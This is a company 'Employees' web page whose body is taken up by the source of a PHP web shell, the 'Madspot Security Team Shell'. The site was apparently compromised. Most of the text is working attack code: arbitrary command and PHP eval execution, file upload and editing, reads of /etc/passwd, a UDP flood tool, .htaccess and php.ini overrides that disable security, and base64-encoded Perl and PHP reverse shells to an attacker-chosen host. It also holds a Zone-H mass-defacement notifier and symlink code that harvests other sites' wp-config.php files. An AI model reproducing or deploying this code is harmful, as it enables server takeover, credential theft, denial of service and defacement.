Кин-Марк
ГлавнаяО компании → Сотрудники

Сотрудники

ON "; $of=" OFF "; $none=" NONE "; if(function_exists('curl_version')) $curl=$on; else $curl=$of; if(function_exists('mysql_get_client_info')) $mysql=$on; else $mysql=$of; if(function_exists('mssql_connect')) $mssql=$on; else $mssql=$of; if(function_exists('pg_connect')) $pg=$on; else $pg=$of; if(function_exists('oci_connect')) $or=$on; else $or=$of; if(@ini_get('disable_functions')) $disfun=@ini_get('disable_functions'); else $disfun="All Functions Enable"; if(@ini_get('safe_mode')) $safe_modes="ON"; else $safe_modes="OFF"; if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir'); else $open_b=$none; if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir'); else $safe_exe=$none; if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir'); else $safe_include=$none; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $drives = ""; foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; echo ' Madspot Security Team Shell '; echo ""; echo '
'; if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { echo ''; } else { echo ''; } } else { echo ''; } echo ''; if($GLOBALS[sys]=="win") { echo ''; } echo '
Uname: '.substr(@php_uname(), 0, 120).'
User: '. $uid . ' [ ' . $user . ' ] Group: ' . $gid . ' [ ' . $group . ' ]
PHP: '.@phpversion(). ' Safe Mode:'.$safe_modes.'
Our IP: '.@$_SERVER["SERVER_ADDR"].' Server IP: '.@$_SERVER["REMOTE_ADDR"].'
WEBS: '; if($GLOBALS['sys']=='unix') { $d0mains = @file("/etc/named.conf"); if(!$d0mains) { echo "CANT READ named.conf"; } else { $count; foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } echo "$count Domains"; } } else{ echo"CANT READ |Windows|";} echo '
HDD: '.madSize($totalSpace).' Free:' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
Useful : '; $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); foreach($userful as $item) if(madWhich($item)) echo $item.','; echo '
Downloader:'; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); foreach($downloaders as $item2) if(madWhich($item2)) echo $item2.','; echo '
useful:'; echo '--------------
Downloader: -------------
Window:'; echo madEx('ver'); echo '
Downloader: -------------
Disabled functions:'.$disfun.'
cURL:'.$curl.' MySQL:'.$mysql.' MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: '.$or.''.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwvZm9udD48L3NwYW4+PC9hPg==").'
Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'
Server '.@getenv('SERVER_SOFTWARE').'
DRIVE: '.$drives.'
PWD: '.$cwd_links.' |CURRENT|
'; } function madfooter() { echo "
__MK FILE__
__MK DIR__
__DELETE__
__CHMOD__
__CHANGE DIR__
__HTTP DOWNLOAD__
__EXECUTE__
Upload file:

"; } if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function madWhich($p) { $path = madEx('which ' . $p); if(!empty($path)) return $path; return false; } function madSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function madPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function madPermsColor($f) { if (!@is_readable($f)) return '' . madPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . madPerms(@fileperms($f)) . ''; else return '' . madPerms(@fileperms($f)) . ''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function madFilesMan() { madhead(); echo '
'; if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_dir(@$_POST['p2'])) deleteDir(@$_POST['p2']); else @unlink(@$_POST['p2']); break; default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_POST['c']; } break; } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo '

| Access Denied! |

';madFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '>| ' . htmlspecialchars($f['name']) . ' |').''.(($f['type']=='file')?madSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').' X
"; madfooter(); } function madFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } madhead(); echo '
'; if( !file_exists(@$_POST['p1']) ) { echo "
FILE DOEST NOT EXITS 
"; madFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' Permission: '.madPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo '
'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?' '.$v.' ':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo ''; madFooter(); } function madphpeval() { madhead(); if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) { echo '
'; ob_start(); $INI=ini_get_all(); print '' .'' .'' .'' .''; foreach ($INI as $param => $values) print "\n".'' .'' .'' .'' .''; $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '
'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) { echo '
'; ob_start(); $EXT=get_loaded_extensions (); print '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].'
'."\n".'
' .implode('
', $EXT) .'
' .count($EXT).' extensions loaded'; echo '

'; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '
| INI_INFO | | phpinfo | | extensions |

'; echo '
';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '
'; madfooter(); } function madhash() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'Htmlspecialchars' => 'htmlspecialchars', ); madhead(); echo '
'; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo "

";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo "
"; madFooter(); } function maddos() { madhead(); echo '
'; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '
| UDP DOSSIER |

Host :Time :Port :
'; echo "
";
    if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3']))
    {
         $packets=0;
        ignore_user_abort(true);
        $exec_time=$_POST['p2'];
        $time=time();
        $max_time=$exec_time+$time;
        $host=$_POST['p1'];
        $portudp=$_POST['p3'];
        for($i=0;$i<65000;$i++)
        {
            $out .= 'X';
        }
        while(1){
    
         $packets++;
            if(time() > $max_time){
                    break;
            }
            
            $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                    fclose($fp);
            }
            }
         echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
         echo "
"; } echo '
'; madfooter(); } function madproc() { madhead(); echo "
"; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; if($GLOBALS['sys']=="win") { $process=array( "System Info" =>"systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); } else { $process=array( "Process status" => "ps aux", "Syslog" =>"cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" =>"cat /etc/hosts", "Passwd" =>"cat /etc/passwd", "Cpuinfo"=>"cat /proc/cpuinfo", "Version"=>"cat /proc/version", "Sbin"=>"ls -al /usr/sbin", "Interrupts"=>"cat /proc/interrupts", "lsattr"=>"lsattr -va", "Uptime"=>"uptime", "Fstab" =>"cat /etc/fstab", "HDD Space" => "df -h" );} foreach($process as $n => $link) { echo ' | '.$n.' | '; } echo "
"; if(!empty($_POST['p1'])) { echo "
";
        echo madEx($_POST['p1']);
        echo '
'; } echo "
"; madfooter(); } function madsafe() { madhead(); echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS['cwd']." |
"; echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) |
'; if(!empty($_POST['p2']) && isset($_POST['p2'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fil); } if(!empty($_POST['p1'])&& isset($_POST['p1'])) { $fil=fopen($GLOBALS['cwd']."php.ini","w"); fwrite($fil,'safe_mode=OFF disable_functions=NONE'); fclose($fil); } if(!empty($_POST['p3']) && isset($_POST['p3'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl'); fclose($fil); } echo "
"; madfooter(); } function madconnect() { madhead(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; echo "

| PERL AND PHP(threads) BACK CONNECT |

"; echo "
PERL BACK CONNECT
IP: Port:
"; echo "
PHP BACK CONNECT
IP: Port:
"; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); echo "
Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."
Connecting...
"; @unlink("/tmp/bc.pl"); } if($_POST['p1']=='php') { @set_time_limit (0); $ip = $_POST['p2']; $port =$_POST['p3']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; echo "
";

if (function_exists('pcntl_fork')) {
	
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		echo "Cant fork!
"; exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { echo "Error: Can't setsid()
"; exit(1); } $daemon = 1; } else { echo "WARNING: Failed to daemonise. This is quite common and not fatal
"; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "$errstr ($errno)"; exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell
"; exit(1); } @stream_set_blocking($pipes[0], 0); @stream_set_blocking($pipes[1], 0); @stream_set_blocking($pipes[2], 0); @stream_set_blocking($sock, 0); echo "Successfully opened reverse shell to $ip:$port
"; while (1) { if (feof($sock)) { echo "ERROR: Shell connection terminated
"; break; } if (feof($pipes[1])) { echo "ERROR: Shell process terminated
"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) echo "SOCK READ
"; $input=fread($sock, $chunk_size); if ($debug) echo "SOCK: $input
"; fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) echo "STDOUT READ
"; $input = fread($pipes[1], $chunk_size); if ($debug) echo "STDOUT: $input
"; fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) echo "STDERR READ
"; $input = fread($pipes[2], $chunk_size); if ($debug) echo "STDERR: $input
"; fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "
"; } } echo "
"; madfooter(); } function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } function madzoneh() { madhead(); if(!function_exists('curl_version')) { echo "
PHP CURL NOT EXIT
"; } echo "

"; echo '

|ZONE-H MASS DEFACER |

| Notifier |




'; if(isset($_POST['p1']) && isset($_POST['p2'])) { $hacker =$_POST['p1']; $method =$_POST['p2']; $neden ="Not available"; $site =$_POST['p3']; $i = 0; $sites = explode("\n", $site); echo "
";
	while($i < count($sites)) 
	{
	if(substr($sites[$i], 0, 4) != "http") 
	{
			$sites[$i] = "http://".$sites[$i];
	}
	ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
	echo "Site : ".$sites[$i]." Defaced !
"; ++$i; } "Sending Sites To Zone-H Has Been Completed Successfully !!
"; } echo "
"; madfooter(); } function madspot() { madhead(); echo "
"; echo "
    
                           |`-:_
  ,----....____            |    `+.                                                           
 (             ````----....|___   |
  \     _                      ````----....____
   \    _)  Coded By: Ikram Ali                ```---.._                       
    \                                                   \ 
  )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
   Madspot is a Team of professional Ethical Hackers From Pakistan.
   We have Years of  Experience in  Security, Penetration & Coding 
   And can Break and Secure.
   
   Version 1.0
   
   Contact : http://www.madspot.net
   
   if you found bug contact our team 
   
   


              .=''=.             
             / _  _ \
            |  d  b  |
            \   /\   / 
           ,/'-=\/=-'\,
          / /        \ \     -----------------------------
         | / Zahid    \ |    Madspot Digital Security Team
         \/ \ Rasheed/ \/    -----------------------------
             '.    .'
             _|`~~`|_
             /|\  /|\    
	
       .-  -.        .-====-.      ,-------.      .-=<>=-.
   /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
  |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
   \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
   ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
 / Waqar.Khan  \    /        \     /'-___-'\    /    :|    \
(_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   :|   (_)
 \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
  \___________/     |________|     \_______/     | Afrasiab|


	
  
  
    
"; madfooter(); } function madsymlink() { madhead(); $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl ); $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl ); echo '

| Domains | | Whole Server Symlink | | Config PHP symlink |

'; if(isset($_POST['p1']) && $_POST['p1']=='website') { echo "
"; $d0mains = @file("/etc/named.conf"); if(!$d0mains){ echo "
Cant access this file on server -> [ /etc/named.conf ]
"; } echo ""; $count=1; foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $count++; }}} echo "
Countdomainsusers
".$count."".$domains[1][0]."".$user['name']."
"; } if(isset($_POST['p2']) && $_POST['p2']=='whole') { @set_time_limit(0); echo "
"; @mkdir('sym',0777); $IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $IIIIIIIIII1I =@fopen ('sym/.htaccess','w'); fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1); @symlink('/','sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if(!$IIIIIIIIIllI) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo ""; foreach($IIIIIIIIIllI as $IIIIIIIIIll1){ if(@eregi('zone',$IIIIIIIIIll1)){ preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11); flush(); if(strlen(trim($IIIIIIIIIl11[1][0])) >2){ $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0])); $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ; @symlink('/','sym/root'); $IIIIIIII1I1l = $IIIIIIIIIl11[1][0]; $IIIIIIII1I11 = '\.ir'; $IIIIIIII1lII = '\.il'; if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) ) { $IIIIIIII1I1l = "
".$IIIIIIIIIl11[1][0].'
'; } echo " "; flush(); } } } } echo "
DomainsUserssymlink
'.$IIIIIIII1I1l.' '.$IIIIIIIII1I1['name']." symlink
"; } if(isset($_POST['p3']) && $_POST['p3']=='config') { echo "
"; @mkdir('sym',0777); $IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $IIIIIIIIII1I =@fopen ('sym/.htaccess','w'); @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1); @symlink('/','sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if(!$IIIIIIIIIllI) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo " "; foreach($IIIIIIIIIllI as $IIIIIIIIIll1){ if(@eregi('zone',$IIIIIIIIIll1)){ preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11); flush(); if(strlen(trim($IIIIIIIIIl11[1][0])) >2){ $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0])); $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php'; $IIIIIIIII11I=get_headers($IIIIIIIII1l1); $IIIIIIIII11l=$IIIIIIIII11I[0]; $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php'; $IIIIIIIIlIII=get_headers($IIIIIIIII111); $IIIIIIIIlIIl=$IIIIIIIIlIII[0]; $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php'; $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1); $IIIIIIIIlIll=$IIIIIIIIlIlI[0]; $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php'; $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1); $IIIIIIIIlI1l=$IIIIIIIIlI1I[0]; 